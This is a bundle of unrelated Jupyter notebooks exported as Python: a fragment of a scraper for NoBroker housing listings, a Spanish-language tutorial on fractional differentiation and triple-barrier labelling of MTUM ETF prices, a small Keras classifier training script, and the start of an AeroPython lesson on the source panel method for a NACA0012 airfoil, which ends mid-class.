location
location.text
# +
name =[] # give empty list here
for i in soup.find_all('div',class_="font-semi-bold heading-6"):
name.append(i.text)
# -
# +
square_feet =[] # give empty list here
for i in soup.find_all('div',class_="nb__FfHqA"):
square_feet.append(i.text)
square_feet
# +
house_title =[] # give empty list here
for i in soup.find_all('h2',class_="heading-6 font-semi-bold nb__25Cl7"):
house_title.append(i.text)
house_title
# +
location =[] # give empty list here
for i in soup.find_all('div',class_="nb__1EwQz"):
location.append(i.text)
location
# +
locati =[] # give empty list here
for i in soup.find_all('div',class_="nb__4L90a"):
locati.append(i.text)
locati
# -
po=[]
for i in range(1, len(locati),1):
po.append(locati[i])
po
# +
full_info = []
detail = soup.find_all('div',class_="font-semi-bold heading-6")
for i in detail:
full_info.append(i.text)
full_info
# -
emi=[]
rate=[]
full_info=[]
# +
for i in soup.find_all("div",class_="font-semi-bold heading-6"):
full_info.append(i.text)
for i in range(0,len(full_info)-1,2):
emi.append(full_info[i])
rate.append(full_info[i+1])
# -
rate
point=[]
for i in range(1, len(full_info),2):
point.append(full_info[i])
point
# +
poin=[]
for i in range(0, len(point),):
poin.append(point[i])
# -
poin
# print length
print(len(point),len(full_info),len(location),len(house_title),len(square_feet))
import pandas as pd
df=pd.DataFrame({'House Title':house_title,'Area':square_feet,'Location': location})
df
|
7)NO BROKER.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fractional differentiation
#
# ## Objetivos
#
# - Revisar algunos algortimos de Advances in Financial Machine Learning. Capítulo 5.
# - Tópicos de Diferenciación fraccionaria.
#
#
# ## Bibliografia
#
# - <NAME>. Advances in Financial Machine Learning. Wiley
#
# ## Recursos
#
# - Python 3.7+
# - Jupyter notebook.
# - Pandas
# - numpy
# - matplotlib
# - stattools
#
# ## Descripcion
#
# En la siguiente notebook vamos a seguir la linea de trabajo del capítulo 5 del libro.
# A partir de un dataset descargado de Yahoo Finance del ETF [MTUM](https://www.ishares.com/us/products/251614/ishares-msci-usa-momentum-factor-etf) vamos a
# generar labels de entrada y salida con el método de la triple frontera:
#
# - Frontera de profit taking (frontera horizontal superior)
# - Frontera de stop loss (frontera horizontal inferior)
# - Frontera temporal (frontera vertical)
#
# Luego, vamos a computar los pesos a cada sample según la superposición de eventos que
# ocurran entre $t_{i,0}$ (evento de nuestra estrategia) y $t_{i,1}$ (vertical barrier)
# del evento $i$.
#
# Dichos pesos los vamos a ponderar temporalmente luego para que los eventos más recientes
# impacten más respecto de los anteriores.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# +
# # %load mpfin.py
import multiprocessing as mp
import datetime as dt
import time
import sys
def mpPandasObj(func,pdObj,numThreads=24,mpBatches=1,linMols=True,**kargs):
'''
Parallelize jobs, return a dataframe or series
multiprocessing snippet [20.7]
+ func: function to be parallelized. Returns a DataFrame
+ pdObj[0]: Name of argument used to pass the molecule
+ pdObj[1]: List of atoms that will be grouped into molecules
+ kwds: any other argument needed by func
Example: df1=mpPandasObj(func,('molecule',df0.index),24,**kwds)
'''
import pandas as pd
#if linMols:parts=linParts(len(argList[1]),numThreads*mpBatches)
#else:parts=nestedParts(len(argList[1]),numThreads*mpBatches)
if linMols:parts=linParts(len(pdObj[1]),numThreads*mpBatches)
else:parts=nestedParts(len(pdObj[1]),numThreads*mpBatches)
jobs=[]
for i in range(1,len(parts)):
job={pdObj[0]:pdObj[1][parts[i-1]:parts[i]],'func':func}
job.update(kargs)
jobs.append(job)
if numThreads==1:out=processJobs_(jobs)
else: out=processJobs(jobs,numThreads=numThreads)
if isinstance(out[0],pd.DataFrame):df0=pd.DataFrame()
elif isinstance(out[0],pd.Series):df0=pd.Series()
else:return out
for i in out:df0=df0.append(i)
df0=df0.sort_index()
return df0
def processJobs_(jobs):
# Run jobs sequentially, for debugging
out=[]
for job in jobs:
out_=expandCall(job)
out.append(out_)
return out
def linParts(numAtoms,numThreads):
# partition of atoms with a single loop
parts=np.linspace(0,numAtoms,min(numThreads,numAtoms)+1)
parts=np.ceil(parts).astype(int)
return parts
def nestedParts(numAtoms,numThreads,upperTriang=False):
# partition of atoms with an inner loop
parts,numThreads_=[0],min(numThreads,numAtoms)
for num in range(numThreads_):
part=1+4*(parts[-1]**2+parts[-1]+numAtoms*(numAtoms+1.)/numThreads_)
part=(-1+part**.5)/2.
parts.append(part)
parts=np.round(parts).astype(int)
if upperTriang: # the first rows are heaviest
parts=np.cumsum(np.diff(parts)[::-1])
parts=np.append(np.array([0]),parts)
return parts
import datetime as dt
def reportProgress(jobNum,numJobs,time0,task):
# Report progress as asynch jobs are completed
msg=[float(jobNum)/numJobs, (time.time()-time0)/60.]
msg.append(msg[1]*(1/msg[0]-1))
timeStamp=str(dt.datetime.fromtimestamp(time.time()))
msg=timeStamp+' '+str(round(msg[0]*100,2))+'% '+task+' done after '+ \
str(round(msg[1],2))+' minutes. Remaining '+str(round(msg[2],2))+' minutes.'
if jobNum<numJobs:sys.stderr.write(msg+'\r')
else:sys.stderr.write(msg+'\n')
return
def processJobs(jobs,task=None,numThreads=24):
# Run in parallel.
# jobs must contain a 'func' callback, for expandCall
if task is None:task=jobs[0]['func'].__name__
pool=mp.Pool(processes=numThreads)
outputs,out,time0=pool.imap_unordered(expandCall,jobs),[],time.time()
# Process asyn output, report progress
for i,out_ in enumerate(outputs,1):
out.append(out_)
reportProgress(i,len(jobs),time0,task)
pool.close();pool.join() # this is needed to prevent memory leaks
return out
def expandCall(kargs):
# Expand the arguments of a callback function, kargs['func']
func=kargs['func']
del kargs['func']
out=func(**kargs)
return out
# +
# # %load labelling.py
import numpy as np
import pandas as pd
def getDailyVol(close, span0=100):
'''
Computes the daily volatility of price returns.
It takes a closing price series, applies a diff sample to sample
(assumes each sample is the closing price), computes an EWM with
`span0` samples and then the standard deviation of it.
See Advances in Financial Analytics, snippet 3.1
@param[in] close A series of prices where each value is the closing price of an asset.
The index of the series must be a valid datetime type.
@param[in] span0 The sample size of the EWM.
@return A pandas series of daily return volatility.
'''
df0 = close.index.searchsorted(close.index-pd.Timedelta(days=1))
df0 = df0[df0 > 0]
df0 = pd.Series(close.index[df0-1], index=close.index[close.shape[0]-df0.shape[0]:])
df0 = close.loc[df0.index] / close.loc[df0.values].values-1 # Daily returns
df0 = df0.ewm(span=span0).std()
return df0
def getVerticalBarrier(tEvents, close, numDays=0):
"""
Adding a Vertical Barrier
For each index in t_events, it finds the timestamp of the next price bar at or immediately after
a number of days num_days. This vertical barrier can be passed as an optional argument t1 in get_events.
This function creates a series that has all the timestamps of when the vertical barrier would be reached.
Advances in Financial Machine Learning, Snippet 3.4 page 49.
@param tEvents A pd.DateTimeIndex of events.
@param close A pd.Series of close prices.
@param numDays The number of days to add for vertical barrier.
@return A pd.Series of Timestamps of vertical barriers
"""
verticalBarrier = close.index.searchsorted(tEvents + pd.Timedelta(days=numDays))
verticalBarrier = verticalBarrier[verticalBarrier < close.shape[0]]
return pd.Series(close.index[verticalBarrier], index = tEvents[:verticalBarrier.shape[0]]) # NaNs at the end
def applyPtSlOnT1(close, events, ptSl, molecule):
'''
Apply stop loss/profit taking, if it takes place before t1 (vertical barrier)
(end of event).
Advances in Financial Machine Learning, snippet 3.2 page 45.
@param close
@param events
@param ptSl
@param molecule
@return
'''
events_ = events.loc[molecule]
out = events_[['t1']].copy(deep=True)
if ptSl[0] > 0:
pt = ptSl[0] * events_['trgt']
else:
pt = pd.Series(index=events.index) # NaNs
if ptSl[1] > 0:
sl = -ptSl[1] * events_['trgt']
else:
sl=pd.Series(index=events.index) # NaNs
for loc, t1 in events_['t1'].fillna(close.index[-1]).iteritems():
df0 = close[loc:t1] # path prices
df0 = (df0 / close[loc] - 1) * events_.at[loc,'side'] # path returns
out.loc[loc,'sl'] = df0[df0<sl[loc]].index.min() # earliest stop loss
out.loc[loc,'pt'] = df0[df0>pt[loc]].index.min() # earliest profit taking
return out
def getEvents(close, tEvents, ptSl, trgt, minRet, numThreads, t1=False, side=None):
#1) get target
trgt=trgt.loc[tEvents]
trgt=trgt[trgt>minRet] # minRet
#2) get t1 (max holding period)
if t1 is False:
t1 = pd.Series(pd.NaT, index=tEvents)
#3) form events object, apply stop loss on t1
if side is None:
side_, ptSl_ = pd.Series(1.,index=trgt.index), [ptSl[0],ptSl[0]]
else:
side_, ptSl_= side.loc[trgt.index],ptSl[:2]
events = (pd.concat({'t1':t1,'trgt':trgt,'side':side_}, axis=1) .dropna(subset=['trgt']))
df0=mpPandasObj(func=applyPtSlOnT1,pdObj=('molecule',events.index),
numThreads=numThreads,close=close,events=events,
ptSl=ptSl_)
events['t1'] = df0.dropna(how='all').min(axis=1) # pd.min ignores nan
if side is None:events=events.drop('side',axis=1)
return events
def getBinsOld(events,close):
# Snippet 3.5
#1) prices aligned with events
events_=events.dropna(subset=['t1'])
px=events_.index.union(events_['t1'].values).drop_duplicates()
px=close.reindex(px,method='bfill')
#2) create out object
out=pd.DataFrame(index=events_.index)
out['ret']=px.loc[events_['t1'].values].values/px.loc[events_.index]-1
out['bin']=np.sign(out['ret'])
# Where out index and t1 (vertical barrier) intersect label 0
# See page 49, it is a suggested exercise.
try:
locs = out.query('index in @t1').index
out.loc[locs, 'bin'] = 0
except:
pass
return out
def getBins(events, close):
'''
Compute event's outcome (including side information, if provided).
Snippet 3.7
Case 1: ('side' not in events): bin in (-1,1) <-label by price action
Case 2: ('side' in events): bin in (0,1) <-label by pnl (meta-labeling)
@param events It's a dataframe whose
- index is event's starttime
- Column t1 is event's endtime
- Column trgt is event's target
- Column side (optional) implies the algo's position side.
@param close It's a close price series.
'''
#1) prices aligned with events
events_=events.dropna(subset=['t1'])
px=events_.index.union(events_['t1'].values).drop_duplicates()
px=close.reindex(px,method='bfill')
#2) create out object
out=pd.DataFrame(index=events_.index)
out['ret']=px.loc[events_['t1'].values].values/px.loc[events_.index]-1
if 'side' in events_:
out['ret']*=events_['side'] # meta-labeling
out['bin']=np.sign(out['ret'])
if 'side' in events_:
out.loc[out['ret']<=0,'bin']=0 # meta-labeling
return out
def dropLabels(events, minPct=.05):
'''
Takes a dataframe of events and removes those labels that fall
below minPct (minimum percentil).
Snippet 3.8
@param events An events dataframe, such as the output of getBins()
@param minPct The minimum percentil of rare labels to have.
@return The input @p events dataframe but filtered.
'''
# apply weights, drop labels with insufficient examples
while True:
df0=events['bin'].value_counts(normalize=True)
if df0.min()>minPct or df0.shape[0]<3:break
print('dropped label: ', df0.argmin(),df0.min())
events=events[events['bin']!=df0.argmin()]
return events
# +
# # %load events.py
def cusumFilterEvents(close, threshold):
'''
Symmetric CUSUM Filter.
It is a quality-control method, designed to detect a shift in
the mean value of the measured quantity away from a target value.
The value of each filter is:
S^{+}_t = max{0, S^{+}_{t-1} + y_t - E_{t-1}[y_t]}, S^{+}_0 = 0
S^{-}_t = mix{0, S^{-}_{t-1} + y_t - E_{t-1}[y_t]}, S^{-}_0 = 0
S_t = max{S^{+}_t, -S^{-}_t}
See Advances in Financial Analytics, snippet 2.4, page 39.
@param close A price series.
@param threshold A positive threshold to flag a positive or negative
event when either S^{+}_t or S^{-}_t is greater than it.
@return A subset of the @p close index series where the events of
filter are triggered.
'''
tEvents = []
sPos = 0
sNeg = 0
diff = close.diff()
for i in diff.index[1:]:
sPos, sNeg = max(0, sPos+diff.loc[i]), min(0, sNeg+diff.loc[i])
if sNeg < -threshold:
sNeg = 0
tEvents.append(i)
elif sPos > threshold:
sPos = 0
tEvents.append(i)
return pd.to_datetime(tEvents)
def getEwmDf(close, fast_window_num_days=3, slow_window_num_days=7):
'''
Generates a close prices dataframe with three columns, where:
- Column "close" is the `close` price.
- Column "fast" is the `fast` EWM with @p fast_window_num_days days window size.
- Column "slow" is the `slow` EWM with @p slow_window_num_days days window size.
@param close A pandas series of close daily prices.
@param fast_window_num_days A positive integer indicating the fast window size in days.
@param slow_window_num_days A positive integer indicating the slow window size in days,
which is greater than @p fast_window_num_days.
@return A dataframe as described above.
'''
close_df = (pd.DataFrame()
.assign(close=close)
.assign(fast=close.ewm(fast_window_num_days).mean())
.assign(slow=close.ewm(slow_window_num_days).mean()))
return close_df
def get_up_cross(df):
'''
@return A pandas series of events from @p df (as provided in getEwmDf()) when the
fast signal crosses over the slow signal positively.
'''
crit1 = df.fast.shift(1) < df.slow.shift(1)
crit2 = df.fast > df.slow
return df.fast[(crit1) & (crit2)]
def get_down_cross(df):
'''
@return A pandas series of events from @p df (as provided in getEwmDf()) when the
fast signal crosses over the slow signal positively.
'''
crit1 = df.fast.shift(1) > df.slow.shift(1)
crit2 = df.fast < df.slow
return df.fast[(crit1) & (crit2)]
def getEwmEvents(close, fast_window_num_days=3, slow_window_num_days=7):
'''
Generates a pandas series from @p close price series whose events are generated
from the EWM fast and slow signal crosses. When the fast signal crosses with a
positive slope the slow signal a "1" is flagged and when the opposite happens
a "-1" is flagged.
@param close A pandas series of close daily prices.
@param fast_window_num_days A positive integer indicating the fast window size in days.
@param slow_window_num_days A positive integer indicating the slow window size in days,
which is greater than @p fast_window_num_days.
@return A pandas series of events of buy and sell signals.
'''
close_df = getEwmDf(close, fast_window_num_days, slow_window_num_days)
up_events = get_up_cross(close_df)
down_events = get_down_cross(close_df)
side_up = pd.Series(1, index=up_events.index)
side_down = pd.Series(-1, index=down_events.index)
return pd.concat([side_up,side_down]).sort_index()
# +
# # %load frac_diff.py
def getWeights(d,size):
'''
Returns a list of coefficients to fractionally differentiate a time series.
@param d A non-negative real that represents the degree of the differentiation.
@param size The number of items .
@return A list with the fractionally differentiated coefficients.
'''
w=[1.]
for k in range(1,size):
w_ = -w[-1]/k*(d-k+1)
w.append(w_)
w = np.array(w[::-1]).reshape(-1,1)
return w
def getWeights_FFD(d,thres):
'''
Returns a list of coefficients to fractionally differentiate a time series.
@param d A non-negative real that represents the degree of the differentiation.
@param thres The minimum absolute value that helps the stop adding items to the list of coefficients.
@return A list with the fractionally differentiated coefficients.
'''
w = [1.]
k = 1
while True:
w_ = -w[-1]/k*(d-k+1)
if abs(w_)<thres:
break
w.append(w_)
k+=1
return np.array(w[::-1]).reshape(-1,1)
def fracDiff(series, d, thres=0.01):
'''
Applies fractionally differentiation to time series. Uses threshold to determine the minimum
value of coefficients the window will have.
@param series A time series to apply the fractionally differentiation.
@param d A non-negative real that represents the degree of the differentiation.
@param thres A threshold to omit samples below that value. When it is 1, nothing is skipped.
@return A DataFrame whose values are fractionally differentiated.
'''
#1) Compute weights for the longest series
w = getWeights(d, series.shape[0])
#2) Determine initial calcs to be skipped based on weight-loss threshold
w_ = np.cumsum(abs(w))
w_ /= w_[-1]
skip = w_[w_>thres].shape[0]
#3) Apply weights to values
df={}
for name in series.columns:
seriesF = series[[name]].fillna(method='ffill').dropna()
df_ = pd.Series()
for iloc in range(skip, seriesF.shape[0]):
loc = seriesF.index[iloc]
test_val = series.loc[loc,name] # must resample if duplicate index
if isinstance(test_val, (pd.Series, pd.DataFrame)):
test_val = test_val.resample('1m').mean()
if not np.isfinite(test_val).any(): continue # exclude NAs
try:
df_.loc[loc] = np.dot(w[-(iloc+1):,:].T, seriesF.loc[:loc])[0,0]
except:
continue
df[name] = df_.copy(deep=True)
df = pd.concat(df,axis=1)
return df
def fracDiff_FFD(series,d,thres=1e-5):
'''
Applies fractionally differentiation to time series. Uses threshold to determine the minimum
coefficient the window will have.
@param series A DataFrame of time series to apply the fractionally differentiation.
@param d A non-negative real that represents the degree of the differentiation.
@param thres A threshold to omit samples below that value. When it is 1, nothing is skipped.
@return A DataFrame whose values are fractionally differentiated.
'''
w = getWeights_FFD(d,thres) # Constant width window (new solution)
width = len(w)-1
df={}
for name in series.columns:
seriesF = series[[name]].fillna(method='ffill').dropna()
df_ = pd.Series()
for iloc1 in range(width,seriesF.shape[0]):
loc0 = seriesF.index[iloc1-width]
loc1 = seriesF.index[iloc1]
test_val = series.loc[loc1,name] # must resample if duplicate index
if isinstance(test_val, (pd.Series, pd.DataFrame)):
test_val = test_val.resample('1m').mean()
if not np.isfinite(test_val).any(): continue # exclude NAs
try:
df_.loc[loc1] = np.dot(w.T, seriesF.loc[loc0:loc1])[0,0]
except:
continue
df[name] = df_.copy(deep=True)
df = pd.concat(df, axis=1)
return df
def compute_multiple_ffd(close, threshold, dd):
from statsmodels.tsa.stattools import adfuller
out = pd.DataFrame(columns=['adfStat','pVal','lags','nObs','95% conf','corr'])
df0 = close
for d in dd:
df1 = np.log(df0).resample('1D').last().dropna() # downcast to daily obs. Dropped NAs
df2 = fracDiff_FFD(df1, d, thres=threshold).dropna()
corr = np.corrcoef(df1.loc[df2.index,'Close'], df2['Close'])[0,1]
df2 = adfuller(df2['Close'], maxlag=1, regression='c', autolag=None)
out.loc[d] = list(df2[:4]) + [df2[4]['5%']]+[corr] # with critical value
return out
def get_d_optim(out, conf=0.05):
return out[out.pVal < conf].pVal.idxmax()
# -
# ### 1.- Exploración del dataset
#
# - Levantamos el datset desde un CSV
# - Nota: indexamos el dataset con la columna de fechas para poder aprovechar las funciones del libro
# como estan dadas.
# - Describimos el dataset.
# - Mostramos la evolución de las series.
#
#
# A saber, las columnas son:
#
# - `Date`: es la fecha que aplica una estampa temporal a la fila.
# - `Open`: es el precio en USD al que abre la cotización del fondo.
# - `High`: es el mayor valor en USD que alcanza la cotización del fondo.
# - `Low`: es el menor valor en USD que alcanza la cotización del fondo.
# - `Close`: es el valor de cierre en USD que alcanza la cotización del fondo.
# - `Adj Close`: es el precio ajustado que alcanzan algunos activos producto de multiplicadores por regalías y dividendos. Ver https://help.yahoo.com/kb/SLN28256.html para una descripción más detallada al respecto.
# - `Volume`: cantidad total de USD operados.
MTUM_PATH = '../datasets/mtum.csv'
# Función que permite convertir el formato de las fechas como string
# en un objeto de fecha.
string_to_date = lambda x: pd.datetime.strptime(x, "%Y-%m-%d")
mtum = pd.read_csv(MTUM_PATH, parse_dates=['Date'], date_parser=string_to_date, index_col='Date')
mtum.head() # Filas iniciales del dataset.
mtum.tail() # Filas finales del dataset.
# [#Filas, #Columnas]
mtum.shape[0], mtum.shape[1]
# Tipo de dato de cada columna.
mtum.dtypes
# Ploteamos la series.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
mtum.plot(kind='line',y='High', color='green', ax=ax)
mtum.plot(kind='line',y='Low', color='red', ax=ax)
mtum.plot(kind='line',y='Open', color='orange', ax=ax)
plt.title('MTUM prices')
plt.grid()
plt.show()
# En particular los va a interesar el precio de cierre.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
plt.title('MTUM Close Price')
plt.grid()
plt.show()
# Solo para comparar, miramos el volumen operado.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Volume', color='blue', ax=ax)
plt.title('MTUM volume')
plt.grid()
plt.show()
# ## 2.- Cómputo de series diferenciadas fraccionariamente
#
# Lo que se busca es obtener la estacionariedad de las series y ello conlleva a diferenciaciones. El inconveniente de la diferenciacion entera es la remoción de la memoria lo cual genera que se pierda información predictiva de la serie que un modelo pueda capturar posteriormente.
#
# El trabajo siguiente de la notebook va a obtener un valor óptimo del grado de diferenciación para mantener la estacionariedad de la serie. El método es por fuerza bruta en un espacio de búsqueda de una dimensión, el grado de diferenciación. En caso de querer ser más precisos, se puede iterar en la búsqueda de un mínimo global pero las diferencias en el segundo decimal son marginales en muchos casos.
#
# La serie diferenciada se la utiliza para la obtención de eventos.
#
# Notar que uno obtiene la volatilidad como indicador de barrera superior e inferior de una serie ya diferenciada!
#
# El proceso de generación es idéntico a los vistos previamente.
# Computo una lista de valores de d (el grado de diferenciación),
# y diferencio la serie de precios.
ds = np.linspace(0, 1, 21)
out = compute_multiple_ffd(mtum['Close'].to_frame(), 1e-3, ds)
out
# Realizamos un plot para evaluar gráficamente el valor óptimo.
out[['adfStat','corr']].plot(secondary_y='adfStat')
mean_95conf = out['95% conf'].mean()
optim_d = get_d_optim(out, conf=0.05)
plt.axhline(mean_95conf,linewidth=1,color='r',linestyle='dotted')
plt.axvline(optim_d,linewidth=1,color='g',linestyle='dotted')
plt.grid()
plt.title('ADF Stat, Autorrelacion vs D')
print('Promedio de valores críticos para el estadístico al 5%: {}'.format(mean_95conf))
print('Valor óptimo de d: {}'.format(optim_d))
mtum['CloseFFD'] = fracDiff_FFD(mtum['Close'].to_frame(), d=optim_d, thres=1e-3)
# Ploteamos la series.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(20,10))
mtum.plot(kind='line',y='Close', color='blue', ax=ax)
mtum.plot(kind='line',y='CloseFFD', color='green', ax=ax)
plt.title('MTUM prices and Optim FFD')
plt.grid()
plt.show()
# ## 3.- Desarrollo con labels
#
# Ver [Labelling sec.2](https://github.com/agalbachicar/financial_analytics/blob/master/notebooks/labelling.ipynb) para más detalle.
# Computamos la volatilidad diaria, suavizada con una media
# movil pesada de 50 dias (arbitraria, también se podria aprender)
daily_vol = getDailyVol(close=mtum['CloseFFD'], span0=50)
# Volatilidad media.
daily_vol.mean()
# Graficamos la volatilidad a lo largo de la historia del ETF.
# La línea roja muestra el valor medio.
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(15,7))
daily_vol.plot(kind='line',y='dailyVol', color='blue', ax=ax)
ax.axhline(daily_vol.mean(),ls='--',color='r')
plt.title('MTUM FFD daily volatility')
plt.grid()
plt.show()
# Usamos CUSUM simetrico como generador de eventos.
# Usamos la media de la volatilidad como umbral que nos indique los eventos
# en que el que operaremos.
tEvents = cusumFilterEvents(mtum['CloseFFD'], threshold=daily_vol.mean())
tEvents
# Definimos el tiempo de la barrera vertical. Esto es algo a optimizar
# y debe ajustarse en conjunto con los valores de retorno PT y SL.
num_days = 6
# Computamos las marcas temporales de la ventana. Para cada evento
# en tEvents (inicio de la ventana), obtenemos el final de la ventana.
t1 = getVerticalBarrier(tEvents, mtum['CloseFFD'], numDays=num_days)
t1
# Definimos las bandas de PT y SL.
ptsl = [2*daily_vol.mean(), 2*daily_vol.mean()]
target = daily_vol
# Seleccionamos el mínimo retorno considerado.
minRet = 0.01
# Numero de CPUs para el procesamiento en paralelo.
cpus = 4
# Generamos los eventos de la triple frontera. En esta funcion obtenemos
# un dataframe cuyo indice es cuando ocurre el evento y tiene 2 columnas
# - t1: momento en el que sucede el evento.
# - trgt: retorno obtenido en ese momento.
triple_barrier_events = getEvents(mtum['CloseFFD'],tEvents,ptsl,target,minRet,cpus,t1=t1)
triple_barrier_events
# Obtenemos los labels! Los labels nos dan la siguiente informacion:
# - Indice: momento en el que ocurre el evento segun nuestra estrategia.
# - Columna ret: el retorno que vamos a obtener.
# - Columna bin: lo que sucede con la señal de precio:
# - 1: la señal impacta la barrera de profit taking (horizontal superior).
# - 0: la señal impacta la barrera vertical (no se hace nada).
# - -1: la señal impacta la barrea de stop loss (horizontal inferior).
labels = getBinsOld(triple_barrier_events, mtum['CloseFFD'])
labels
# Una pequeña tabla de contención que nos indica como se distribuyen
# los labels.
labels['bin'].value_counts()
|
src/notebooks/frac_diff.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import Preprocess as util
import numpy as np
import matplotlib.pyplot as plt
import keras
import keras.backend as K
from sklearn.model_selection import train_test_split
from keras.models import Model, Sequential, Input
from keras.layers import Dropout, Flatten, Dense
# # Load and Train and Test Split
# +
input_data, labels = util.load_data()
print('Input Data Shape = {}'.format(input_data.shape))
print('Labels Shape = {}'.format(labels.shape))
train_x, test_x, train_y, test_y = train_test_split(input_data, labels, test_size = 0.20, random_state = 42)
print('Training input data shape = {}'.format(train_x.shape))
print('Training labels shape = {}'.format(train_y.shape))
print('Testing input data shape = {}'.format(test_x.shape))
print('Testing labels shape = {}'.format(test_y.shape))
# -
# # Architecture of Neural Network
# +
input_tensor = Input(shape = (input_data.shape[1],))
def model(input_value):
x = Dense(units = 200, activation = 'tanh')(input_value)
x = Dense(units = 100, activation = 'relu')(x)
x = Dense(units = 50, activation = 'tanh')(x)
x = Dense(units = 30, activation = 'relu')(x)
x = Dense(units = 10, activation = 'tanh')(x)
output = Dense(units = 1, activation = 'sigmoid')(x)
model = Model(inputs = input_value, outputs = output, name = 'model')
model.summary()
return model
def compile_and_train(model, num_epochs):
model.compile(optimizer= 'adam', loss= 'mse', metrics = ['acc'])
history = model.fit(train_x, train_y, batch_size=32, epochs = num_epochs)
return history
# -
# # Training Model on Train Dataset
epochs = 200
model = model(input_tensor)
history = compile_and_train(model, epochs)
# # Plot the Graphs
# +
epoch_list = [i for i in range(epochs)]
loss_list = history.history['loss']
acc_list = history.history['acc']
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.plot(epoch_list,loss_list, label = 'Loss')
plt.show()
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.plot(epoch_list,acc_list, label = 'Accuracy')
plt.show()
# -
# # Testing the Data
loss,acc = model.evaluate(test_x,test_y)
print('Test Loss = {}'.format(loss))
print('Test Accuracy = {}'.format(acc))
|
Train Test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ###### Content provided under a Creative Commons Attribution license, CC-BY 4.0; code under MIT license. (c)2014 <NAME>, <NAME>. Thanks: NSF for support via CAREER award #1149784.
# ##### Version 0.4 -- April 2015
# # Source panel method
# We are now getting close to the finish line with *AeroPython*! Our first few lessons introduced the fundamental flow solutions of potential flow, and we quickly learned that using our superposition powers we could get some useful results in aerodynamics.
#
# The superposition of a [doublet](03_Lesson03_doublet.ipynb) and a free stream gave the flow around a circular cylinder, and we learned about the *D'Alembert paradox*: the result of zero drag for potential flow around a cylinder. Adding a [vortex](06_Lesson06_vortexLift.ipynb) at the center of the cylinder, we learned about lift and the *Kutta-Joukowski theorem* stating that lift is proportional to circulation: $L=\rho U \Gamma$. A most important result!
#
# Adding together fundamental solutions of potential flow and seeing what we get when interpreting a dividing streamline as a solid body is often called an *indirect method*. This method goes all the way back to Rankine in 1871! But its applicability is limited because we can't stipulate a geometry and find the flow associated to it.
#
# In [Lesson 9](09_Lesson09_flowOverCylinder.ipynb), we learned that it is possible to stipulate first the geometry, and then solve for the source strengths on a panel discretization of the body that makes the flow tangent at the boundary. This is called a *direct method* and it took off in the 1960s with the work of <NAME> Smith at Douglas Aircraft Company.
#
# A set of panels (line segments in 2D) can represent the surface of any solid body immersed in a potential flow by making the source-sheet strengths such that the normal velocity at each panel is equal to zero. This is a very powerful idea! But you should realize that all the panel strengths are coupled to each other, which is why we end up with a linear system of equations.
#
# For an arbitrary geometry, we need to build a set of panels according to some points that define the geometry. In this lesson, we will read from a file a geometry definition corresponding to a **NACA0012 airfoil**, create a set of panels, and solve for the source-sheet strengths to get flow around the airfoil.
#
# *Make sure you have studied [Lesson 9](09_Lesson09_flowOverCylinder.ipynb) carefully before proceeding!* We will not repeat the full mathematical formulation in this notebook, so refer back as needed.
#
# First, load our favorite Python libraries, and the `integrate` module from SciPy:
import os
import math
import numpy
from scipy import integrate
from matplotlib import pyplot
# display the figures in the Notebook
# %matplotlib inline
# Next, we read the body geometry from a file using the NumPy function [`loadtxt()`](http://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html). The file comes from the [Airfoil Tools](http://airfoiltools.com/airfoil/details?airfoil=n0012-il) website and it contains a set of coordinates for the standard NACA0012 symmetric profile. We saved the file in the `resources` folder and load it from our local copy.
#
# The geometry points get loaded into one NumPy array, so we separate the data into two arrays: `x,y` (for better code readability). The subsequent code will plot the geometry of the airfoil.
# +
# read of the geometry from a data file
naca_filepath = os.path.join('resources', 'naca0012.dat')
with open (naca_filepath, 'r') as file_name:
x, y = numpy.loadtxt(file_name, dtype=float, delimiter='\t', unpack=True)
# plot the geometry
width = 10
pyplot.figure(figsize=(width, width))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.plot(x, y, color='k', linestyle='-', linewidth=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(-0.1, 0.1);
# -
# ## Discretization into panels
# Like in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb), we will create a discretization of the body geometry into panels (line segments in 2D). A panel's attributes are: its starting point, end point and mid-point, its length and its orientation. See the following figure for the nomenclature used in the code and equations below.
#
# <img src="./resources/panelSketch.png" width="400">
# We can modify the `Panel` class from our previous notebook slightly, to work better for our study of flow over an airfoil. The only difference is that we identify points on the top or bottom surfaces with the words `upper` and `lower`, which is only used later for plotting results with different colors for the top and bottom surfaces of the profile.
class Panel:
"""
Contains information related to a panel.
"""
def __init__(self, xa, ya, xb, yb):
"""
Initializes the panel.
Sets the end-points and calculates the center, length,
and angle (with the x-axis) of the panel.
Defines if the panel is on the lower or upper surface of the geometry.
Initializes the source-sheet strength, tangential velocity,
and pressure coefficient to zero.
Parameters
----------
xa: float
x-coordinate of the first end-point.
ya: float
y-coordinate of the first end-point.
xb: float
x-coordinate of the second end-point.
yb: float
y-coordinate of the second end-point.
"""
self.xa, self.ya = xa, ya
self.xb, self.yb = xb, yb
self.xc, self.yc = (xa + xb) / 2, (ya + yb) / 2 # control-point (center-point)
self.length = math.sqrt((xb - xa)**2 + (yb - ya)**2) # length of the panel
# orientation of the panel (angle between x-axis and panel's normal)
if xb - xa <= 0.0:
